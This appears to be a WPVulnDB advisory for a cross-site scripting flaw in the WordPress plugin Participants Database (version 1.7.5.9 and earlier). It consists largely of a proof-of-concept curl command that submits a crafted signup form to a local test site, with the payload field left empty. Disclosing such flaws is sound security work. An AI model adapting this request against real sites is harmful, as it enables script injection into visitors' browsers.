Participants Database <= 1.7.5.9 - Cross-Site Scripting

2017-09-06T00:00:00
ID WPVDB-ID:8896
Type wpvulndb
Reporter Benjamin Lim
Modified 2019-11-01T00:00:00

Description

WordPress Vulnerability - Participants Database <= 1.7.5.9 - Cross-Site Scripting curl -k -F action=signup -F subsource=participants-database -F shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2 -F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F first_name= -F last_name=a -F email=a@a.com -F mailing_list=No -F submit_button=Submit http://localhost/?page_id=1